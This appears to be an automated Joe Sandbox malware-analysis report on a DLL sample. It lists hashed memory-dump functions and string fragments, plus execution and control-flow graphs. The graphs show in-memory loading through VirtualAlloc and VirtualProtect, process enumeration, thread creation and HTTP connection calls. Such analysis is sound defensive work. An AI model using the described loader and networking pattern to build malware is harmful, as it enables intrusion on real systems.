                                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                                • API String ID: 0-746338152
                                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                                • API String ID: 0-498664264
                                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                                • API String ID: 0-784369960
                                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ,IW$G$JMg$l
                                                                                                                                                • API String ID: 0-1370644289
                                                                                                                                                • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                                • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                                • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                                • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ,$,$2S=$i`}G
                                                                                                                                                • API String ID: 0-4285990414
                                                                                                                                                • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                                • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                                • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                                • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:19.4%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:5%
                                                                                                                                                Total number of Nodes:80
                                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                                execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 180015388 3920 1800227d4 3917->3920 3919 1800153e3 3924 18002281d 3920->3924 3922 180024315 3922->3919 3924->3922 3926 18001c05c 3924->3926 3930 18001c568 3924->3930 3937 180017908 3924->3937 3928 18001c0af 3926->3928 3929 18001c2e1 3928->3929 3941 18002ad58 3928->3941 3929->3924 3934 18001c58a 3930->3934 3932 18001c948 3932->3924 3934->3932 3948 180003598 3934->3948 3952 18000ac48 3934->3952 3956 180025dac 3934->3956 3960 1800097c0 3934->3960 3939 180017932 3937->3939 3938 180015e2c CreateThread 3938->3939 3939->3938 3940 180017bcd 3939->3940 3940->3924 3944 1800046a8 3941->3944 3943 18002ae38 3943->3928 3946 1800046ec 3944->3946 3945 180004982 3945->3943 3946->3945 3947 180004945 Process32FirstW 3946->3947 3947->3946 3950 180003640 3948->3950 3949 1800044c0 3949->3934 3950->3949 3964 18001ed50 3950->3964 3954 18000ac8e 3952->3954 3953 18000b5fe 3953->3934 3954->3953 3955 18001ed50 CreateFileW 3954->3955 3955->3954 3959 180025dde 3956->3959 3958 180026180 3958->3934 3959->3958 3971 180015e2c 3959->3971 3961 1800097fc 3960->3961 3962 18000981d 3961->3962 3963 18001ed50 CreateFileW 3961->3963 3962->3934 3963->3961 3965 18001ed7a 3964->3965 3967 18001f06b 3965->3967 3968 18000fb00 3965->3968 3967->3950 3970 18000fb80 3968->3970 3969 18000fc15 CreateFileW 3969->3965 3970->3969 3973 180015ea5 3971->3973 3972 180015f3b CreateThread 3972->3959 3973->3972 3974 180015e2c 3976 180015ea5 3974->3976 3975 180015f3b CreateThread 3976->3975 3977 18001496c 3978 1800149ce 3977->3978 3979 1800152ba 3978->3979 3980 18000fb00 CreateFileW 3978->3980 3980->3978 3981 180024d80 3983 180024eed 3981->3983 3982 1800250bd 3983->3982 3985 180019a30 3983->3985 3986 180019aa4 3985->3986 3987 180019b2a GetVolumeInformationW 3986->3987 3987->3982 3988 21e0000 3989 21e0183 3988->3989 3990 21e043e VirtualAlloc 3989->3990 3993 21e0462 3990->3993 3991 21e0531 GetNativeSystemInfo 3992 21e056d VirtualAlloc 3991->3992 3997 21e0a7b 3991->3997 3995 21e058b 3992->3995 3993->3991 3993->3997 3994 21e0a00 3996 21e0a56 RtlAddFunctionTable 3994->3996 3994->3997 3995->3994 3998 21e09d9 VirtualProtect 3995->3998 3996->3997 3998->3995

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 21e0000-21e0460 call 21e0aa8 * 2 VirtualAlloc 22 21e048a-21e0494 0->22 23 21e0462-21e0466 0->23 26 21e049a-21e049e 22->26 27 21e0a91-21e0aa6 22->27 24 21e0468-21e0488 23->24 24->22 24->24 26->27 28 21e04a4-21e04a8 26->28 28->27 29 21e04ae-21e04b2 28->29 29->27 30 21e04b8-21e04bf 29->30 30->27 31 21e04c5-21e04d2 30->31 31->27 32 21e04d8-21e04e1 31->32 32->27 33 21e04e7-21e04f4 32->33 33->27 34 21e04fa-21e0507 33->34 35 21e0509-21e0511 34->35 36 21e0531-21e0567 GetNativeSystemInfo 34->36 37 21e0513-21e0518 35->37 36->27 38 21e056d-21e0589 VirtualAlloc 36->38 39 21e051a-21e051f 37->39 40 21e0521 37->40 41 21e058b-21e059e 38->41 42 21e05a0-21e05ac 38->42 43 21e0523-21e052f 39->43 40->43 41->42 44 21e05af-21e05b2 42->44 43->36 43->37 46 21e05b4-21e05bf 44->46 47 21e05c1-21e05db 44->47 46->44 48 21e05dd-21e05e2 47->48 49 21e061b-21e0622 47->49 52 21e05e4-21e05ea 48->52 50 21e06db-21e06e2 49->50 51 21e0628-21e062f 49->51 54 21e06e8-21e06f9 50->54 55 21e0864-21e086b 50->55 51->50 53 21e0635-21e0642 51->53 56 21e05ec-21e0609 52->56 57 21e060b-21e0619 52->57 53->50 60 21e0648-21e064f 53->60 61 21e0702-21e0705 54->61 58 21e0917-21e0929 55->58 59 21e0871-21e087f 55->59 56->56 56->57 57->49 57->52 62 21e092f-21e0937 58->62 63 21e0a07-21e0a1a 58->63 64 21e090e-21e0911 59->64 65 21e0654-21e0658 60->65 66 21e06fb-21e06ff 61->66 67 21e0707-21e070a 61->67 69 21e093b-21e093f 62->69 88 21e0a1c-21e0a27 63->88 89 21e0a40-21e0a4a 63->89 64->58 68 21e0884-21e08a9 64->68 70 21e06c0-21e06ca 65->70 66->61 71 21e070c-21e071d 67->71 72 21e0788-21e078e 67->72 94 21e08ab-21e08b1 68->94 95 21e0907-21e090c 68->95 75 21e09ec-21e09fa 69->75 76 21e0945-21e095a 69->76 73 21e06cc-21e06d2 70->73 74 21e065a-21e0669 70->74 77 21e071f-21e0720 71->77 78 21e0794-21e07a2 71->78 72->78 73->65 80 21e06d4-21e06d5 73->80 84 21e067a-21e067e 74->84 85 21e066b-21e0678 74->85 75->69 86 21e0a00-21e0a01 75->86 82 21e095c-21e095e 76->82 83 21e097b-21e097d 76->83 87 21e0722-21e0784 77->87 90 21e085d-21e085e 78->90 91 21e07a8 78->91 80->50 96 21e096e-21e0979 82->96 97 21e0960-21e096c 82->97 99 21e097f-21e0981 83->99 100 21e09a2-21e09a4 83->100 101 21e068c-21e0690 84->101 102 21e0680-21e068a 84->102 98 21e06bd-21e06be 85->98 86->63 87->87 103 21e0786 87->103 104 21e0a38-21e0a3e 88->104 92 21e0a4c-21e0a54 89->92 93 21e0a7b-21e0a8e 89->93 90->55 105 21e07ae-21e07d4 91->105 92->93 107 21e0a56-21e0a79 RtlAddFunctionTable 92->107 93->27 116 21e08bb-21e08c8 94->116 117 21e08b3-21e08b9 94->117 95->64 108 21e09be-21e09bf 96->108 97->108 98->70 109 21e0989-21e098b 99->109 110 21e0983-21e0987 99->110 114 21e09ac-21e09bb 100->114 115 21e09a6-21e09aa 100->115 112 21e06a5-21e06a9 101->112 113 21e0692-21e06a3 101->113 111 21e06b6-21e06ba 102->111 103->78 104->89 106 21e0a29-21e0a35 104->106 126 21e07d6-21e07d9 105->126 127 21e0835-21e0839 105->127 106->104 107->93 122 21e09c5-21e09cb 108->122 109->100 120 21e098d-21e098f 109->120 110->108 111->98 112->98 121 21e06ab-21e06b3 112->121 113->111 114->108 115->108 124 21e08ca-21e08d1 116->124 125 21e08d3-21e08e5 116->125 123 21e08ea-21e08fe 117->123 128 21e0999-21e09a0 120->128 129 21e0991-21e0997 120->129 121->111 130 21e09cd-21e09d3 122->130 131 21e09d9-21e09e9 VirtualProtect 122->131 123->95 142 21e0900-21e0905 123->142 124->124 124->125 125->123 133 21e07db-21e07e1 126->133 134 21e07e3-21e07f0 126->134 135 21e083b 127->135 136 21e0844-21e0850 127->136 128->122 129->108 130->131 131->75 138 21e0812-21e082c 133->138 139 21e07fb-21e080d 134->139 140 21e07f2-21e07f9 134->140 135->136 136->105 141 21e0856-21e0857 136->141 138->127 144 21e082e-21e0833 138->144 139->138 140->139 140->140 141->90 142->94 144->126
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663294418.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_21e0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction ID: ffdcf8bff4a8c585b38f823c71de2d644857795ded63c994222b9a3ac2b3b12c
                                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction Fuzzy Hash: 5D72D130A58F488BCB29DF28CC856B9B7E1FB98305F14462DE89BD7211DB74D582CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #X$Ec;$J$^c$^c$n
                                                                                                                                                • API String ID: 0-2929744921
                                                                                                                                                • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                                • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                                                                                                • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                                • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                                • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                                • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 5IF$P)#
                                                                                                                                                • API String ID: 0-1025399686
                                                                                                                                                • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                                                • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                                                                                                • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
